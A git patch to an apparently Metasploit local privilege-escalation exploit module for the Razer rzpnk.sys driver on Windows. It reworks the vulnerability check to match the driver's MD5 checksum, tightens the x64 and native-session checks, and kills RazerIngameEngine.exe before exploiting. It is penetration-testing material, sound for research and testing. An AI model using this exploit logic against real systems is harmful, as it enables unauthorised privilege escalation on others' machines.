From b4813ce2c7fb72732377c85c033856886c861e89 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Sat, 15 Jul 2017 14:48:54 -0400
Subject: [PATCH] Update the pre-exploit check conditions

---
 .../windows/local/razer_zwopenprocess.rb      | 33 +++++++++++--------
 1 file changed, 20 insertions(+), 13 deletions(-)

diff --git a/modules/exploits/windows/local/razer_zwopenprocess.rb b/modules/exploits/windows/local/razer_zwopenprocess.rb
index b7e44c6825e3..2bbf3cb82704 100644
--- a/modules/exploits/windows/local/razer_zwopenprocess.rb
+++ b/modules/exploits/windows/local/razer_zwopenprocess.rb
@@ -70,15 +70,22 @@ def initialize(info = {})
   end
 
   def check
-    pid = session.sys.process['RazerIngameEngine.exe']
-    session.sys.process.kill(pid) unless pid.nil?
-
-    pid = session.sys.process['winlogon.exe']
-    handle = get_handle(pid)
-    return Exploit::CheckCode::Safe if handle.nil?
+    # Validate that the driver has been loaded and that
+    # the version is the same as the one expected
+    client.sys.config.getdrivers.each do |d|
+      if d[:basename].downcase == 'rzpnk.sys'
+        expected_checksum = 'b4598c05d5440250633e25933fff42b0'
+        target_checksum = client.fs.file.md5(d[:filename])
+
+        if expected_checksum == Rex::Text.to_hex(target_checksum, '')
+          return Exploit::CheckCode::Appears
+        else
+          return Exploit::CheckCode::Detected
+        end
+      end
+    end
 
-    session.railgun.kernel32.CloseHandle(handle)
-    Exploit::CheckCode::Vulnerable
+    Exploit::CheckCode::Safe
   end
 
   def exploit
@@ -90,14 +97,14 @@ def exploit
       fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
     end
 
-    if sysinfo['Architecture'] =~ /wow64/i
-      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
-    elsif sysinfo['Architecture'] == ARCH_X86
-      fail_with(Failure::NoTarget, 'Session host is x86, but only x64 targets are supported')
+    if session.platform != 'windows'
+      fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
+    elsif session.arch != ARCH_X64
+      fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets')
     end
 
     pid = session.sys.process['RazerIngameEngine.exe']
-    unless pid.nil?
+    if pid
       # if this process is running, the IOCTL won't work but the process runs
       # with user privileges so we can kill it
       print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...")